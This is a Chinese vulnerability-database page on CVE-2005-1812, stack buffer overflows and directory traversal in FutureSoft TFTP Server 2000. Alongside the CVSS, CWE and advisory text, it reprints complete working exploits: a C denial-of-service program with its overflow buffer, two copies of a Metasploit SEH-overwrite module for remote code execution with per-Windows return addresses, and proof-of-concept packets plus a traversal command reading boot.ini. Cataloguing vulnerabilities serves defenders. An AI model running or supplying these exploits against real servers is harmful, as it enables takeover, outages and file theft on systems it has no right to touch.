CVE-2005-1812
CVSS10.0
发布时间 :2005-06-01 00:00:00
修订时间 :2008-09-05 00:00:00
NMCOEPS    

[原文]Multiple stack-based buffer overflows in FutureSoft TFTP Server Evaluation Version 1.0.0.1 allow remote attackers to execute arbitrary code via a long (1) filename or (2) transfer mode string in a Read Request (RRQ) or Write Request (WRQ) packet.


[CNNVD]FutureSoft TFTP Server 2000 远程缓冲区溢出漏洞(CNNVD-200506-015)

        TFTP Server 2000是一款运行于Windows平台上的TFTP服务器软件,支持所有RFC1350兼容的客户端。
        TFTP Server 2000处理畸形文件访问请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在TFTP服务器上执行任意指令。
        文件访问请求中超长的文件名或类型字段会导致服务器发生缓冲区溢出,从而执行攻击者指令的任意指令,获取服务器的控制。
        <**>
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1812
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1812
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-015
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/13821
(UNKNOWN)  BID  13821
http://www.security.org.sg/vuln/tftp2000-1001.html
(UNKNOWN)  MISC  http://www.security.org.sg/vuln/tftp2000-1001.html
http://securitytracker.com/id?1014079
(UNKNOWN)  SECTRACK  1014079
http://secunia.com/advisories/15539
(UNKNOWN)  SECUNIA  15539

- 漏洞信息

FutureSoft TFTP Server 2000 远程缓冲区溢出漏洞
危急 缓冲区溢出
2005-06-01 00:00:00 2005-10-20 00:00:00
远程  
        TFTP Server 2000是一款运行于Windows平台上的TFTP服务器软件,支持所有RFC1350兼容的客户端。
        TFTP Server 2000处理畸形文件访问请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在TFTP服务器上执行任意指令。
        文件访问请求中超长的文件名或类型字段会导致服务器发生缓冲区溢出,从而执行攻击者指令的任意指令,获取服务器的控制。
        <**>
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.futuresoft.com/products/lit-tftp2000.htm

- 漏洞信息 (1027)

FutureSoft TFTP Server 2000 Remote Denial of Service Exploit (EDBID:1027)
windows dos
2005-06-02 Verified
0 ATmaCA
[点击下载] [点击下载]
/*
*
* FutureSoft TFTP Server 2000 Remote Denial of Service Exploit
* http://www.futuresoft.com/products/lit-tftp2000.htm
* Bug Discovered by SIG^2 (http://www.security.org.sg)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan
* Usage:tftp_exp <targetIp> [targetPort]
*
*/

/*
*
* Vulnerable Versions:
* TFTP Server 2000 Evaluation Version 1.0.0.1
*
*/

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

/* |RRQ|AAAAAAAAAAAAAAAA....|NULL|netasc|NULL| */
char expbuffer[] =
"\x00\x01"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x58\x58\x58\x58" /* EIP */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x6E\x65\x74\x61\x73\x63\x69"
"\x69\x00";

void main(int argc, char *argv[])
{
        WSADATA wsaData;
        WORD wVersionRequested;
        struct hostent *pTarget;
        struct sockaddr_in sock;
        SOCKET mysocket;
        int destPORT = 69;//Default to 69

        if (argc < 2){
                printf("FutureSoft TFTP Server 2000 Remote Denial of Service Exploit\n");
                printf("http://www.futuresoft.com/products/lit-tftp2000.htm\n");
                printf("Bug Discovered by SIG^2 (http://www.security.org.sg)\n");
                printf("Exploit coded By ATmaCA\n");
                printf("Web: atmacasoft.com && spyinstructors.com\n");
                printf("E-Mail: atmaca@icqmail.com\n");
                printf("Credit to kozan\n");
                printf("Usage:tftp_exp <targetIp> [targetPort]\n");
                return;
        }
        if (argc==3)
                destPORT=atoi(argv[2]);

        printf("Requesting Winsock...\n");
        wVersionRequested = MAKEWORD(1, 1);
        if (WSAStartup(wVersionRequested, &wsaData) < 0) {
                printf("No winsock suitable version found!");
                return;
        }
        mysocket = socket(AF_INET, SOCK_DGRAM	, 0);
        if(mysocket==INVALID_SOCKET){
                printf("Can't create UDP socket\n");
                exit(1);
        }
        printf("Resolving Hostnames...\n");
        if ((pTarget = gethostbyname(argv[2])) == NULL){
                printf("Resolve of %s failed\n", argv[1]);
                exit(1);
        }
        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
        sock.sin_family = AF_INET;
        sock.sin_port = htons(destPORT);

        printf("Connecting...\n");
        if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
                printf("Couldn't connect to host.\n");
                exit(1);
        }

        printf("Connected!...\n");
        Sleep(10);

        printf("RRQ->Sending packet. Size: %d\n",sizeof(expbuffer));
        if (send(mysocket,expbuffer, sizeof(expbuffer)+1, 0) == -1){
                printf("Error sending packet\n");
                closesocket(mysocket);
                exit(1);
        }
        printf("Packet sent........\n");
        printf("Success.\n");

        closesocket(mysocket);
        WSACleanup();
}

// milw0rm.com [2005-06-02]
		

- 漏洞信息 (16344)

FutureSoft TFTP Server 2000 Transfer-Mode Overflow (EDBID:16344)
windows remote
2010-05-09 Verified
0 metasploit
[点击下载] [点击下载]
##
# $Id: futuresoft_transfermode.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FutureSoft TFTP Server 2000 Transfer-Mode Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the FutureSoft TFTP Server
				2000 product. By sending an overly long transfer-mode string, we were able
				to overwrite both the SEH and the saved EIP. A subsequent write-exception
				that will occur allows the transferring of execution to our shellcode
				via the overwritten SEH. This module has been tested against Windows
				2000 Professional and for some reason does not seem to work against
				Windows 2000 Server (could not trigger the overflow at all).
			},
			'Author'         => 'MC',
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					['CVE', '2005-1812'],
					['OSVDB', '16954'],
					['BID', '13821'],
					['URL', 'http://www.security.org.sg/vuln/tftp2000-1001.html'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 350,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4} ], # ws2help.dll
					['Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad} ], # ws2help.dll
					['Windows NT SP5/SP6a English',    { 'Ret' => 0x776a1799} ], # ws2help.dll
					['Windows 2003 Server English',    { 'Ret' => 0x7ffc0638} ], # PEB return
				],
			'Privileged'     => true,
			'DisclosureDate' => 'May 31 2005'))

		register_options(
			[
				Opt::RPORT(69)
			], self.class)

	end

	def exploit
		connect_udp

		print_status("Trying target #{target.name}...")

		sploit  = "\x00\x01" + rand_text_english(14, payload_badchars) + "\x00"
		sploit += rand_text_english(167, payload_badchars)
		seh  = generate_seh_payload(target.ret)
		sploit[157, seh.length] = seh
		sploit += "\x00"

		udp_sock.put(sploit)

		handler
		disconnect_udp
	end

end
		

- 漏洞信息 (F83173)

FutureSoft TFTP Server 2000 Transfer-Mode Overflow (PacketStormID:F83173)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,shellcode
windows,2k
CVE-2005-1812
[点击下载]

This Metasploit module exploits a stack overflow in the FutureSoft TFTP Server 2000 product. By sending an overly long transfer-mode string, we were able to overwrite both the SEH and the saved EIP. A subsequent write-exception that will occur allows the transferring of execution to our shellcode via the overwritten SEH. This Metasploit module has been tested against Windows 2000 Professional and for some reason does not seem to work against Windows 2000 Server (could not trigger the overflow at all).

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FutureSoft TFTP Server 2000 Transfer-Mode Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the FutureSoft TFTP Server
				2000 product. By sending an overly long transfer-mode string, we were able
				to overwrite both the SEH and the saved EIP. A subsequent write-exception 
				that will occur allows the transferring of execution to our shellcode 
				via the overwritten SEH. This module has been tested against Windows
				2000 Professional and for some reason does not seem to work against 
				Windows 2000 Server (could not trigger the overflow at all).
			},
			'Author'         => 'MC',
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2005-1812'],
					['OSVDB', '16954'],
					['BID', '13821'],
					['URL', 'http://www.security.org.sg/vuln/tftp2000-1001.html'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 350,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
				
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					['Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4} ], # ws2help.dll
					['Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad} ], # ws2help.dll
					['Windows NT SP5/SP6a English',    { 'Ret' => 0x776a1799} ], # ws2help.dll
					['Windows 2003 Server English',    { 'Ret' => 0x7ffc0638} ], # PEB return

				],

			'Privileged'     => true,

			'DisclosureDate' => 'May 31 2005'))

			register_options(
			[
				Opt::RPORT(69)
			], self.class)

	end

	def exploit
		connect_udp

		print_status("Trying target #{target.name}...")

		sploit  = "\x00\x01" + rand_text_english(14, payload_badchars) + "\x00"
		sploit += rand_text_english(167, payload_badchars)
		seh  = generate_seh_payload(target.ret)
		sploit[157, seh.length] = seh
		sploit += "\x00"

		udp_sock.put(sploit)

		handler
		disconnect_udp
	end

end
    

- 漏洞信息

16954
FutureSoft TFTP Server 2000 Multiple Remote Overflows
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in TFTP Server 2000. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long filename or transfer-mode string, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-05-31 2005-05-18
2005-06-02 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

FutureSoft TFTP Server 2000 Multiple Remote Vulnerabilities
Unknown 13821
Yes No
2005-05-31 12:00:00 2008-12-04 01:21:00
Discovery is credited to Tan Chew Keong.

- 受影响的程序版本

FutureSoft TFTP Server 2000 1.0 .0.1

- 漏洞讨论

FutureSoft TFTP Server 2000 is affected by multiple remote vulnerabilities. Exploiting these issues can allow an attacker to retrieve arbitrary files and carry out buffer-overflow attacks.

The following specific issues were identified:

- Multiple buffer overflow vulnerabilities. A successful attack may allow the attacker to execute arbitrary code on a vulnerable computer and gain unauthorized access in the context of the server. A denial-of-service condition may arise as well.

- A directory-traversal vulnerability. A successful attack may allow the attacker to access arbitrary files (if the server has permissions to access the file).

These issues have been confirmed on TFTP Server 2000 Evaluation Version 1.0.0.1. Other versions may be affected as well.

- 漏洞利用

The following proof-of-concept examples are available:

A crafted packet with an overly long filename string.
------------------------------------------
|RRQ|AAAAAAAAAAAAAAAA....|NULL|octet|NULL|
------------------------------------------

A crafted packet with an overly long transfer-mode string.
------------------------------------------
|RRQ|a.txt|NULL|AAAAAAAAAAAAAAA.....|NULL|
------------------------------------------

tftp -i 192.168.2.5 GET ../../../../../boot.ini

A Metasploit proof-of-concept exploit is available from y0@w00t-shell.net:

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站